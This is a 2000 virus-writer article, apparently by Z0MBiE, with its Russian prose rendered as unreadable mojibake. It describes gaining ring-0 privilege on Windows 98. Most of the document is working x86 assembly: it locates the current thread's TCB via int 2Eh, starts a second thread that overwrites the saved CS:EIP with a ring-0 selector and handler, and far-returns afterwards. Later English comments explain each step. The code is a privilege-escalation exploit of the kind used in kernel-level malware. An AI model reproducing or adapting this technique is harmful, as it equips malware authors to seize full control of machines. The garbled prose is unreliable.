
                         win98:  ring-0 १ TCB
                         -------------------------

                              (x) 2000 Z0MBiE
                           http://z0mbie.cjb.net

     襬    ।⠢  ।  ᯮᮡ  室  ring0,
 ࠢ ⮫쪮  win98.      ।  win9X.

       砥    ᫥饬.      (thread)  
 ,  뢠  TCB (Thread Control Block).   ᮤন
    类   ᭮  ଠ樨,  ਬ    ॣ஢,   
 ⭮, CS:EIP.   win9X, TCB, ᠬ ᮡ,  ய.

        TCB? ⢥ म TCB  㤮 ᨣ: 'THCB'.
   ᪠ 直 ⮩   㦥, ⭮ , , ⮬ 
 win98  ᤥ ⠪:

                        ; Locate the calling thread's TCB through the int 2Eh
                        ; service dispatcher (service number in EAX, as the
                        ; original comment names it). The pointer is stored in
                        ; a global so that a *different* thread can later find
                        ; and modify this thread's control block.
                        ; NOTE(review): the listing gives two service numbers
                        ; (4Fh/93h); which one applies presumably depends on the
                        ; Win9x build -- confirm before relying on either.
                        mov     eax, 4Fh    ; 4Fh/93h: i2E_xxGetCurrentThread
                        int     2Eh
                        mov     eax, [eax]  ; EAX <-- current TCB (dereferences the returned pointer)
                        mov     save_tcbptr, eax ; main thread's TCB, read by newthread below

       ᪠,   ய CS:EIP  ⥪饩     -- 
 ⮥, ⠪  ᮧ  ⮣  .

                        ; CreateThread(NULL, 0, newthread, 12345678h, 0, &tid)
                        ; -- stdcall, so arguments are pushed right-to-left.
                        ; The second thread exists only to rewrite the main
                        ; thread's saved context while the main thread is
                        ; blocked in Sleep; the 12345678h parameter is never
                        ; read by newthread.
                        ; callW: presumably a macro around the imported API
                        ; call -- its definition is not on this page.
                        push    offset tid      ; *ThreadId
                        push    0               ; flags
                        push    12345678h       ; parameter (unused by newthread)
                        push    offset newthread; address
                        push    0               ; stack size. 0==same
                        push    0               ; lpThreadAttributes (NULL)
                        callW   CreateThread

     , ਮ⠭ ⥪ , ⮡ 믮  ᮧ:

                        ; Sleep(1): give up the CPU so the new thread gets to
                        ; run and patch this thread's TCB. This is a timing
                        ; assumption, not synchronization -- nothing here
                        ; guarantees newthread has completed before this
                        ; thread is rescheduled.
                        push    1               ; while threads switching
                        callW   Sleep

      ,  㦥 뢠  㫥.   ந室   ?

;-----------------------------------------------------------------------
; newthread -- thread entry point, runs at ring 3 in the second thread.
; Rewrites the saved user-mode CS:EIP of the *main* thread (the one
; blocked in Sleep) inside that thread's TCB, so that when the kernel
; resumes the main thread it lands in `ring0` with CS = 28h instead of
; returning to the code after Sleep. The displaced CS:EIP is kept in
; save_cs / save_eip so `ring0` can far-return to it.
; This only works because the TCB, including the saved ring-3 register
; frame, is plain memory writable from ring 3 with no privilege check;
; on a kernel with proper user/kernel isolation these stores would fault.
; In:    save_tcbptr = main thread's TCB (set by the caller)
; Out:   save_eip, save_cs updated; main thread's Client_EIP/Client_CS patched
; Clobb: none (pusha/popa restore all GP registers); thread exit code
;        is whatever popa leaves in EAX
;-----------------------------------------------------------------------
newthread:              pusha

                        mov     eax, save_tcbptr                ; main TCB
                        mov     eax, [eax].TCB_ClientPtr        ; registers (saved ring-3 frame of the main thread)

                        ; Swap the saved return EIP with the address of ring0;
                        ; xchg leaves the original EIP in ECX.
                        lea     ecx, ring0
                        xchg    ecx, [eax].Client_EIP           ; EIP
                        mov     save_eip, ecx

                        ; Swap the saved return CS with the ring-0 code selector.
                        ; Only the low 16 bits are exchanged; ECX was 28h, so the
                        ; high word is 0 and save_cs holds the old CS zero-extended.
                        mov     ecx, 28h ; std. win9x ring0 selector
                        xchg    cx, [eax].Client_CS             ; CS
                        mov     save_cs, ecx

                        popa
                        retn

       ,      CS:EIP    ᢮  ᮡ⢥.   ⠪
 룫廊 楤,    ࠢ  㫥:

;-----------------------------------------------------------------------
; ring0 -- entered in the main thread at the moment the kernel would have
; returned it to user mode, but with CS = 28h (ring 0) because newthread
; patched the saved frame. The register values are the main thread's
; user-mode ones, so they are saved and restored around the ring-0 work.
; DS/ES are loaded from SS so that data accesses use the selector the
; stack is already using at entry -- presumably a flat ring-0 data
; selector; the code relies on SS being usable as a data segment here.
; Exit is a 32-bit far return to the original user CS:EIP saved by
; newthread (save_cs already holds CS zero-extended to 32 bits), which
; drops back to ring 3 at the instruction after Sleep.
; Clobb: none visible (pusha/popa, push/pop ds es); EFLAGS are not
;        explicitly preserved across the ring-0 work
;-----------------------------------------------------------------------
ring0:                  pusha
                        push    ds es

                        mov     eax, ss
                        mov     ds, eax
                        mov     es, eax

                        ; (original comment garbled in the source) --
                        ; the actual ring-0 work goes here

                        pop     es ds
                        popa

                        ; cs: override so the globals are reachable
                        ; regardless of what DS now holds
                        push    cs:save_cs
                        push    cs:save_eip
                        retf                    ; far return: pops EIP, then CS -> back to ring 3

     , ᮡ⢥,  .   祣 ?
